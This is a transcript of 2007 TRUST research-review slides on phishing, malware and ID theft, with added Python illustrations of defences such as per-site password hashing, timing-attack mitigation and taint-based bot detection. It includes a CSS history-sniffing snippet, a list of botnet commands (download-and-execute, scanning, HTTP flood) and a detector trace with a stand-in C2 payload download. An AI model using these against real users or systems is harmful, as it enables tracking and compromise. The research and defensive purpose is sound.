TRANSCRIPT
TRUST, Berkeley Meetings, March 19-21, 2007
Online ID Theft, Phishing, and Malware
Primary faculty
Stanford: Boneh, Mitchell
Berkeley: Tygar, Mulligan
CMU: Perrig, Song
Topics
Phishing detection and prevention
– Browser extensions, server support
– Cache and link attacks, timing attacks, …
– Authentication using trusted platforms: smartphone, virtualization, password token
User interface issues
– Tricky problem: users are fooled
– Do users understand EULAs? (need I ask?)
Malware detection and mitigation
– Signature generation
– Behavioral botnet detection
Classical phishing attack
Sends email: “There is a problem with your eBuy account”
User clicks on email link to www.ebuj.com.
User thinks it is ebuy.com, enters eBuy username and password.
Password sent to bad guy
Modern threats
Spear phishing
– Targeted email to known customers, evades spam filter
Man-in-the-middle attacks
– Forward communication to honest server
– Attack one-time passwords, server defenses
Cookie theft
Keyloggers
– Install via worms, or as browser infections
– Acoustic emanations
Botnets
– Host keyloggers, send spam, steal credentials, etc.
– Vint Cerf: as many as ¼ of all machines on the Internet
Many user interface issues related to deception
Basic questions
Security of human/computer systems
– Phishing: not an attack on the OS, network protocol, or computer application
– Attack on the user through the user’s computer
– Deception works because the user has incomplete and unreliable information, or does not understand the information that is presented
Web authentication
– How can clients and servers authenticate each other?
– Passwords are low entropy but easy to remember
– Images and other indicators are easy to spoof, esp. if the attacker has info about the user
Isolation for web “sessions”
– Implicit notion of process: user visiting site
– Many complexities: ads, redirects, mashups
Privacy expectations and laws
– Users transmit sensitive information to web sites
– What privacy can they expect? How can this be guaranteed?
Part of the problem is to identify and articulate the core issues
– Principled understanding of web activity will lead to more secure browser design, a clearer understanding of the contract between browser and server, and better server practices
Berkeley: Dynamic Security Skins
Automatically customize secure windows
Visual hashes
– Random Art: visual hash algorithm
– Generate unique abstract image for each authentication
– Use the image to “skin” windows or web content
– Browser generated or server generated
Commercial spin-off
CMU: Phoolproof prevention
Eliminates reliance on perfect user behavior
Protects against keyloggers, spyware
Uses a trusted mobile device to perform mutual authentication with the server
SafeHistory
Adaptive phishing attacks (a super-phish):
– Phishing site queries the browser’s visited links:
  <style>a:visited { background: url(track.php?example.com); }</style>
  <a href="http://example.com/">Hi</a>
– Presents phishing page based on visited links
SafeHistory (www.safehistory.com)
– Enforce “same origin policy” on browser state
Tech transfer: available as Firefox extension
– www.safehistory.com
PwdHash (www.pwdhash.com)
pwd → Hash(pwd, domain-name)
Browser extension for stronger pwd auth.
– Mostly transparent to users
– Main challenge: block Javascript-based attacks
Recent work:
– Tech transfer: integrate with RSA SecurID server
– Consistent interface for IE and Firefox extensions
– Computerworld 2006 Horizon award
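Added illustration of the per-site hashing idea behind Hash(pwd, domain-name); this is a simplified Python model, not the PwdHash extension's own code, and it assumes a registrable domain is the last two host labels (the real extension has its own hash, encoding and domain rules):

```python
import base64
import hashlib
import hmac

def effective_domain(url_host: str) -> str:
    """Reduce a host name to its registrable domain (assumption: last two
    labels; multi-part suffixes such as co.uk are not handled here)."""
    labels = url_host.lower().strip().rstrip(".").split(".")
    return ".".join(labels[-2:])

def site_password(master_pwd: str, url_host: str, length: int = 12) -> str:
    """Derive the password actually submitted to a site from the user's master
    password and the site's domain (simplified model of the PwdHash idea)."""
    domain = effective_domain(url_host)
    # Keyed hash: the master password is the key, the domain is the message,
    # so the value a site receives changes whenever the domain changes.
    digest = hmac.new(master_pwd.encode("utf-8"), domain.encode("utf-8"),
                      hashlib.sha256).digest()
    # Printable encoding, truncated to fit typical site password rules.
    return base64.b64encode(digest).decode("ascii")[:length]

def phisher_learns_site_password(master_pwd: str, real_host: str,
                                 phish_host: str) -> bool:
    """True only if the value captured at phish_host would also log in at
    real_host, i.e. only when both hosts share a registrable domain."""
    return site_password(master_pwd, phish_host) == site_password(master_pwd, real_host)

if __name__ == "__main__":
    pwd = "correct horse"  # constructed master password
    print("ebuy.com     :", site_password(pwd, "www.ebuy.com"))
    print("ebuj.com     :", site_password(pwd, "www.ebuj.com"))
    print("phisher wins :", phisher_learns_site_password(pwd, "ebuy.com", "ebuj.com"))
```

Because the look-alike domain from the classical attack slide (ebuj.com) hashes differently from ebuy.com, what the phishing site captures does not work at the real site.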
Berkeley: Understanding EULAs
Confirmed previous study: EULAs are not effective in informing users even when agreements are read by the user
– Users exhibit high installation rates, lack of knowledge about the program, and high regret
Short notice before or after the installation can significantly influence users’ behavior if subjects paused to read it
– Lower installation rates, but still noticeable regret
– Reading times correlated with decision making and regret
– Post notice more effective in grabbing the attention of every user
– Other support mechanisms needed to help the user
Last TRUST Review: Stanford study on spyware motivated by EULA legal issues
Malware detection
Minesweeper: Automatically Identifying Trigger-based Behavior in Programs– Dawn Song, CMU
Panorama: Capturing System-wide Information Flow for Malware Detection and Analysis– Dawn Song, CMU
BotSwat: Host-based behavioral bot detection– Liz Stinson, John Mitchell, Stanford
Privacy and ID Theft Issues in ePassports
Recent RFID passport requirements in the U.S. and Germany
Uses Basic Access Control
Passport holder has no way of knowing if their passport is being scanned
Uses an ISO 14443 contactless RFID chip from Infineon with 64K memory
Contains JPEGs of photos and fingerprints
ePassports
• Guessing the access key: the access key is derived from the MRZ, which consists of the passport #, year of birth, and check digits. But passport #s are sequential, implying a correlation between date of issue and #. If you can see the passport holder, can a hacker guess someone’s birth year?
• Traceability: RFID systems use fixed unique low-level tag identifiers, making an ePassport traceable.
• Eavesdropping: “listening” to a legitimate reader-RFID conversation.
• Often overlooked: fallback. What if my biometric identity has been compromised? How can I prove “it wasn’t me”?
Research Spotlight
Cookie Management
• Locked IP Cookies
• Doppelganger
Doug Tygar
Chris Karlof
David Wagner
Umesh Shankar
Cookie Management
Cookies are both a challenge and opportunity for ID theft protection
Doppelganger: a system for automatically sensing how cookies are used
IP locked cookies: a framework alternative to anti-phishing and anti-pharming
– Unlike existing solutions (SiteKey), robust against man-in-the-middle attacks
Berkeley: Doppelganger
(Karlof, U. Shankar)
Flexible automatic cookie management
Notes when cookies make a difference to the web page
Berkeley: Locked IP cookies
Powerful solution to Phishing (Karlof, Tygar, Wagner)
Research Spotlight
Keyboard Acoustic Emanations
Li Zhuang
Feng Zhou
Doug Tygar
Keyboard Acoustic Sniffing
Acoustic emanations from keyboard
Example of statistical learning techniques in computer security (vulnerability analysis, detection)
Overview
Initial training: wave signal → Feature Extraction → Unsupervised Learning → Language Model Correction → Sample Collector → Classifier Builder → keystroke classifier (and recovered keystrokes)
Subsequent recognition: wave signal → Feature Extraction → Keystroke Classifier → Language Model Correction (optional) → recovered keystrokes
Two Copies of Recovered Text
Figure (text samples not reproduced): recovered text before spelling and grammar correction, and after spelling and grammar correction
Legend: _____ = errors in recovery; second marking = errors corrected by grammar
Experiment
Single keyboard
– Logitech Elite Duo wireless keyboard
– 4 data sets recorded in two settings: quiet and noisy
Keystrokes are clearly separable from consecutive keys
– Automatically extract keystroke positions in the signal, with some manual error correction
Data sets
        Recording length   Number of words   Number of keys
Set 1   ~12 min            ~400              ~2500
Set 2   ~27 min            ~1000             ~5500
Set 3   ~22 min            ~800              ~4200
Set 4   ~24 min            ~700              ~4300

Recovery rate (%)
          Set 1          Set 2          Set 3          Set 4
          Word   Char    Word   Char    Word   Char    Word   Char
Initial   35     76      39     80      32     73      23     68
Final     90     96      89     96      83     95      80     92
Research Spotlight
Timing Attacks
Andrew Bortz, Palash Nandy, Dan Boneh, John Mitchell
Web servers are vulnerable to timing attacks that reveal useful phishing information
Spear-Phishing
Targeted email to known potential victims, e.g., customers of a specific bank
– Beats existing filtering techniques
– Higher success rate
– Lower detection rate
But the attacker needs to know which sites a user visits
– Generally hard to obtain this type of data
Forget your password?
Most sites have “Forgot my password” pages
– These pages frequently leak whether an email is valid or not at that site
Direct Timing
Time a login attempt: the response time of the server depends on whether the email address used is valid or not
This problem affects every tested web site!
Cross-Site Timing Attack
Hijack a user’s browser session to time sites
Many timing dependencies on the user’s relationship with the target site
Here, we can distinguish logged in from not
Solutions and Future Work
Good solutions are server-side
– Client-side solutions exist only for cross-site timing, and they are brittle
Controlling response time to mitigate attacks
– Eliminate the problem by making every response take the same amount of time
– If that is impossible, then “round” the amount of response time
Future work:
– Apache module to control response time automatically
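Added example (not from the authors' paper or their Apache module) showing the direct-timing leak on a "does this email exist" login path next to the two server-side mitigations listed above: equal work for every response, and rounding the response time up to a fixed quantum. The user table, password hash cost and quantum are constructed assumptions.

```python
import hashlib
import hmac
import os
import time

def slow_hash(password: str, salt: bytes) -> bytes:
    # Deliberately costly password hash (PBKDF2); its cost is what makes the
    # early-return path for unknown e-mails measurably faster.
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 20_000)

# Constructed user table: email -> (salt, hash). Not any real site's data.
_SALT = os.urandom(16)
USERS = {"alice@example.com": (_SALT, slow_hash("correct horse", _SALT))}
# Dummy record hashed against when the e-mail is unknown, to equalise work.
_DUMMY_SALT = os.urandom(16)
_DUMMY = (_DUMMY_SALT, slow_hash("unused-dummy-value", _DUMMY_SALT))

def login_leaky(email: str, password: str) -> bool:
    """Pattern the slide warns about: unknown e-mails skip the slow hash."""
    rec = USERS.get(email)
    if rec is None:
        return False                        # fast path reveals "no such account"
    salt, stored = rec
    return hmac.compare_digest(slow_hash(password, salt), stored)

def login_constant_work(email: str, password: str) -> bool:
    """Mitigation 1: every response performs the same hashing work."""
    salt, stored = USERS.get(email, _DUMMY)
    ok = hmac.compare_digest(slow_hash(password, salt), stored)
    return bool(ok & (email in USERS))      # both operands always evaluated

def round_response_time(fn, quantum: float = 0.1):
    """Mitigation 2: pad so the response ends on a multiple of `quantum` seconds."""
    def wrapper(*args):
        start = time.monotonic()
        result = fn(*args)
        elapsed = time.monotonic() - start
        padded = -(-elapsed // quantum) * quantum   # round up to the next bucket
        time.sleep(max(0.0, padded - elapsed))
        return result
    return wrapper

def timed(fn, *args) -> float:
    """Wall-clock seconds for one call; compare the login variants with it."""
    start = time.monotonic()
    fn(*args)
    return time.monotonic() - start
```

Timing login_leaky with a known versus an unknown address shows the gap the slide describes; the same comparison against login_constant_work or a round_response_time-wrapped login shows it collapse.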
Research Spotlight
User Interfaces
An Evaluation of Extended Validation and Picture-in-Picture Phishing Attacks
Collin Jackson
Dan Simon, Desney Tan
Adam Barth
Anti-Phishing Features in IE7
Results: Is this site legitimate?
Future
– More user studies, UI evaluations
Research Spotlight
Minesweeper:
Automatically Identifying Trigger-based Behavior in Programs
Dawn Song
Research Spotlight
BotSwat
Host-based behavioral bot detection
Dawn Song
Elizabeth Stinson, John Mitchell
Botnet
Figure: bot master → intermediary → IRC servers (IRC svr, IRC svr, IRC svr, …)
sample bot commands
execute {0,1} <prog_path> [params]
killprocess <proc_name>
makedir <loc_path>
http.execute <URL> <local_path>
ping <host/IP> <num> <size> <t_out>
scan <IP> <port> <delay>
redirect <loc_port> <rem_host> <rem_port>
ddos.httpflood <URL> <#> <ref> <recurse?>
BotSwat
Figure: data from SOURCES flows through the program (?) to SINKS such as bind(…), CreateProcessA(…), NtCreateFile(…), …
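Added example of the source-to-sink idea behind BotSwat's host-based behavioral detection; this is illustrative Python, not BotSwat's code. It assumes a hypothetical API monitor that yields (api, args) records, treats network receives as the taint source, and uses the sink calls named on the figure; taint is tracked per token and matched by substring, a simplification of real taint tracking. The trace is constructed.

```python
# Constructed trace of (api, args) records from a hypothetical user-level API
# monitor. The first record models one of the bot commands from the previous
# slide arriving over the network; later records are what the host then does.
TRACE = [
    ("recv", {"buf": "http.execute http://c2.example/payload.exe C:\\tmp\\p.exe"}),
    ("NtCreateFile", {"path": "C:\\tmp\\p.exe"}),
    ("CreateProcessA", {"cmdline": "C:\\tmp\\p.exe"}),
    ("CreateProcessA", {"cmdline": "C:\\Windows\\notepad.exe"}),  # local, benign
    ("bind", {"port": 6667}),                                    # not tainted here
]

SOURCES = {"recv"}                                  # network input (assumption)
SINKS = {"bind", "CreateProcessA", "NtCreateFile"}  # calls named on the figure
MIN_TOKEN = 4  # ignore tiny tokens that would match by coincidence

def detect(trace):
    """Flag sink calls whose arguments carry data received from the network.
    Returns (api, argument name, tainted token) triples, in trace order."""
    taint, alerts = set(), []
    for api, args in trace:
        if api in SOURCES:
            # Taint every sufficiently long token of the received buffer.
            taint.update(t for t in args["buf"].split() if len(t) >= MIN_TOKEN)
            continue
        if api not in SINKS:
            continue
        for name, value in args.items():
            for tok in taint:
                if tok in str(value):
                    alerts.append((api, name, tok))
    return alerts

def is_bot_like(trace) -> bool:
    """External control over a sensitive call is the behavioural signal."""
    return bool(detect(trace))

if __name__ == "__main__":
    for alert in detect(TRACE):
        print("tainted sink:", alert)
```

The benign notepad launch and the bind call are not flagged because none of their arguments derive from the received buffer.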
Technology Transition Plan
PwdHash: RSA Security (www.pwdhash.com)
– Initial integration completed fall 2006
– Hope to convince IE team to embed natively in IE
SpyBlock deployment:
– Available at http://getspyblock.com/
– Relevant companies: Mocha5, VMWare
– Dialog with companies about transaction generators
SafeHistory: Microsoft, Mozilla
– Available at www.safehistory.com
Public relations activities
News articles on PwdHash:
– Many articles in popular press, still appearing
– Computerworld Horizon Award: August 2006
SafeHistory & SafeCache:
– WWW ’06 paper
Timing attacks:
– WWW ’07 paper
SpyBlock and transaction generation:
– Report completed; conference paper in process
PwdHash and RSA SecurID
Tech transfer: available as IE and Firefox extensions
– Working to convince MS to embed natively into IE
Integration with RSA SecurID:
– Motivation: “man in the middle” phishing attacks defeat one-time password systems
– Phase I: apply PwdHash to one-time passwords; requires updates to SecurID server and PwdHash
– Phase II: authenticate server to client; planned for next year